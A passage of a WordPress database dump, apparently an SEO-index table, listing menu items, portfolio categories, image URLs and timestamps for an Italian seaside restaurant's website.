Coupon','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:57:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1175,NULL,NULL,17,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:57:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1176,NULL,NULL,59,'post','nav_menu_item',1,10,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:57:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1177,NULL,NULL,57,'post','nav_menu_item',1,10,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:57:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1178,NULL,NULL,58,'post','nav_menu_item',1,10,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:57:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1179,NULL,NULL,56,'post','nav_menu_item',1,10,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:57:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1180,NULL,NULL,124,'post','nav_menu_item',1,10,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:57:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1181,NULL,NULL,18,'post','nav_menu_item',1,10,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:57:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1182,NULL,NULL,19,'post','nav_menu_item',1,10,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:57:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1183,NULL,NULL,45,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:57:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1184,NULL,NULL,110,'post','nav_menu_item',1,22,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:57:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1185,NULL,NULL,118,'post','nav_menu_item',1,22,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:57:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1186,NULL,NULL,119,'post','nav_menu_item',1,22,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:57:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1187,NULL,NULL,121,'post','nav_menu_item',1,22,NULL,NULL,'Emilia Romagna / Val D&#8217;Aosta','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:57:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1188,NULL,NULL,120,'post','nav_menu_item',1,22,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:57:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1189,NULL,NULL,112,'post','nav_menu_item',1,22,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:57:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1190,NULL,NULL,117,'post','nav_menu_item',1,22,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:57:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1191,NULL,NULL,111,'post','nav_menu_item',1,22,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:57:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1192,NULL,NULL,113,'post','nav_menu_item',1,22,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:57:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1193,NULL,NULL,126,'post','nav_menu_item',1,22,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:57:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1194,NULL,NULL,129,'post','nav_menu_item',1,22,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:57:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1195,NULL,NULL,123,'post','nav_menu_item',1,22,NULL,NULL,'Champagne – Assemblaggi','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:57:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1196,NULL,NULL,122,'post','nav_menu_item',1,22,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:57:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1197,NULL,NULL,128,'post','nav_menu_item',1,22,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:57:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1198,NULL,NULL,130,'post','nav_menu_item',1,22,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:57:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1199,NULL,NULL,115,'post','nav_menu_item',1,22,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:57:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1200,NULL,NULL,127,'post','nav_menu_item',1,22,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:57:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1201,NULL,NULL,66,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:57:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1202,NULL,NULL,176,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:57:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1203,NULL,NULL,885,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:57:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1204,NULL,NULL,3373,'post','masonry-gallery',1,0,NULL,NULL,'Creazioni','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0126.jpg',NULL,'1177','featured-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0126.jpg','1177','featured-image','{\"width\":1280,\"height\":853,\"url\":\"https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0126.jpg\",\"path\":\"/home/baltazar/ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0126.jpg\",\"size\":\"full\",\"id\":1177,\"alt\":\"\",\"pixels\":1091840,\"type\":\"image/jpeg\"}',0,NULL,NULL,'2020-12-06 10:59:39','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1830,NULL,NULL,3984,'post','nav_menu_item',1,0,NULL,NULL,'Coupon','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-22 08:35:31','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1210,NULL,NULL,3379,'post','nav_menu_item',1,0,NULL,NULL,'Orari','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 11:06:07','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1211,NULL,NULL,3380,'post','nav_menu_item',1,0,NULL,NULL,'Chi siamo','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 11:08:12','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1832,NULL,NULL,70,'user',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,NULL,NULL,NULL,NULL,'https://secure.gravatar.com/avatar/975eafb09093e0212dea047542b8cc06?s=500&d=mm&r=g',NULL,NULL,'gravatar-image',NULL,NULL,'https://secure.gravatar.com/avatar/975eafb09093e0212dea047542b8cc06?s=500&d=mm&r=g',NULL,'gravatar-image',NULL,NULL,NULL,NULL,'2021-01-22 10:00:36','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1213,NULL,NULL,3382,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 11:11:00','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1214,NULL,NULL,3383,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 11:11:00','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1215,NULL,NULL,3384,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 11:11:00','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1216,'https://www.ristorantesolymar.it/vecchio/masonry-gallery-category/cucina/','73:40d8838cde9e2acde31feb20b6733154',82,'term','masonry-gallery-category',NULL,NULL,NULL,NULL,'Cucina',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 11:16:10','2021-02-05 03:03:23',1,NULL,NULL,NULL,NULL,0,NULL),(1217,'https://www.ristorantesolymar.it/vecchio/portfolio-item/secondi-di-pesce/','73:a3d189fa8ddb8d813abda60aa8d2910d',3388,'post','portfolio-item',1,0,NULL,NULL,'Secondi di pesce','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0122.jpg',NULL,'1182','featured-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0122.jpg','1182','featured-image','{\"width\":853,\"height\":1280,\"url\":\"https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0122.jpg\",\"path\":\"/home/baltazar/ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0122.jpg\",\"size\":\"full\",\"id\":1182,\"alt\":\"\",\"pixels\":1091840,\"type\":\"image/jpeg\"}',0,2,NULL,'2020-12-06 17:22:05','2021-02-04 19:17:19',1,NULL,NULL,NULL,NULL,0,NULL),(1218,'https://www.ristorantesolymar.it/vecchio/portfolio-category/primi-piatti/','73:6331ffa7f381b37298c94049b54a94a5',83,'term','portfolio-category',NULL,NULL,NULL,NULL,'Primi piatti',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:22:30','2021-02-01 05:34:06',1,NULL,NULL,NULL,NULL,0,NULL),(1219,'https://www.ristorantesolymar.it/vecchio/portfolio-item/location-sulla-spiaggia/','80:db5a5306ee64075248bb4a51e899a3cc',3389,'post','portfolio-item',1,0,NULL,NULL,'Location sulla spiaggia','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0052.jpg',NULL,'1198','featured-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0052.jpg','1198','featured-image','{\"width\":853,\"height\":1280,\"url\":\"https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0052.jpg\",\"path\":\"/home/baltazar/ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0052.jpg\",\"size\":\"full\",\"id\":1198,\"alt\":\"\",\"pixels\":1091840,\"type\":\"image/jpeg\"}',0,NULL,NULL,'2020-12-06 17:23:12','2021-02-04 19:17:09',1,NULL,NULL,NULL,NULL,0,NULL),(1220,'https://www.ristorantesolymar.it/vecchio/portfolio-category/location/','69:063caae890c48c2bd3a1855f2a073cd9',84,'term','portfolio-category',NULL,NULL,NULL,NULL,'Location',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:23:43','2021-02-26 00:10:09',1,NULL,NULL,NULL,NULL,0,NULL),(1221,'https://www.ristorantesolymar.it/vecchio/portfolio-item/secondi/','64:10f68d526a39604a62df5135ec886f48',3390,'post','portfolio-item',1,0,NULL,NULL,'Secondi','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1444.jpg',NULL,'136','featured-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1444.jpg','136','featured-image','{\"width\":900,\"height\":675,\"url\":\"https://www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1444.jpg\",\"path\":\"/home/baltazar/ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1444.jpg\",\"size\":\"full\",\"id\":136,\"alt\":\"\",\"pixels\":607500,\"type\":\"image/jpeg\"}',0,NULL,NULL,'2020-12-06 17:24:20','2021-02-04 06:18:46',1,NULL,NULL,NULL,NULL,0,NULL),(1222,'https://www.ristorantesolymar.it/vecchio/portfolio-category/secondi-piatti/','75:c41a87419244e648de2a896f67f3f6e6',85,'term','portfolio-category',NULL,NULL,NULL,NULL,'Secondi piatti',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:25:16','2021-02-02 01:33:59',1,NULL,NULL,NULL,NULL,0,NULL),(1223,'https://www.ristorantesolymar.it/vecchio/portfolio-tag/carne/','61:0f526a5bad92b3418608c60fdb339d26',86,'term','portfolio-tag',NULL,NULL,NULL,NULL,'carne',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:28:45','2021-02-01 08:33:18',1,NULL,NULL,NULL,NULL,0,NULL),(1224,'https://www.ristorantesolymar.it/vecchio/portfolio-tag/location/','64:b3ec31ab12b5cbfc467a3b8f613c309a',87,'term','portfolio-tag',NULL,NULL,NULL,NULL,'location',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:28:58','2021-02-26 15:45:08',1,NULL,NULL,NULL,NULL,0,NULL),(1225,'https://www.ristorantesolymar.it/vecchio/portfolio-tag/pesce/','61:4928a7cbd3b83dcec5195398373b0d95',88,'term','portfolio-tag',NULL,NULL,NULL,NULL,'pesce',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:29:09','2021-02-07 05:30:21',1,NULL,NULL,NULL,NULL,0,NULL),(1226,NULL,NULL,89,'term','portfolio-tag',NULL,NULL,NULL,NULL,'dolce',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:30:29','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1227,NULL,NULL,3395,'post','nav_menu_item',1,0,NULL,NULL,'Home','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1228,NULL,NULL,3396,'post','nav_menu_item',1,0,NULL,NULL,'Pages','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1229,NULL,NULL,3397,'post','nav_menu_item',1,0,NULL,NULL,'Blog','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1230,NULL,NULL,3398,'post','nav_menu_item',1,0,NULL,NULL,'Shop','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1231,NULL,NULL,3399,'post','nav_menu_item',1,0,NULL,NULL,'Portfolio','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1232,NULL,NULL,3400,'post','nav_menu_item',1,0,NULL,NULL,'Elements','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1233,NULL,NULL,3401,'post','nav_menu_item',1,0,NULL,NULL,'Home','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1234,NULL,NULL,3402,'post','nav_menu_item',1,0,NULL,NULL,'Pages','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1235,NULL,NULL,3403,'post','nav_menu_item',1,0,NULL,NULL,'Portfolio','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1236,NULL,NULL,3404,'post','nav_menu_item',1,0,NULL,NULL,'Shop','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1237,NULL,NULL,3405,'post','nav_menu_item',1,0,NULL,NULL,'Blog','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1238,NULL,NULL,3406,'post','nav_menu_item',1,0,NULL,NULL,'Elements','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1239,NULL,NULL,3407,'post','nav_menu_item',1,0,NULL,NULL,'Home','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1240,NULL,NULL,3408,'post','nav_menu_item',1,0,NULL,NULL,'Pages','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1241,NULL,NULL,3409,'post','nav_menu_item',1,0,NULL,NULL,'Shop','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1242,NULL,NULL,3410,'post','nav_menu_item',1,0,NULL,NULL,'Portfolio','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1243,NULL,NULL,3411,'post','nav_menu_item',1,0,NULL,NULL,'Blog','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1244,NULL,NULL,3412,'post','nav_menu_item',1,0,NULL,NULL,'Home','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1245,NULL,NULL,3413,'post','nav_menu_item',1,0,NULL,NULL,'Pages','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 17:47:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1246,NULL,NULL,3414,'post','nav_menu_item',1,0,NULL,NULL,'Shop','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-06 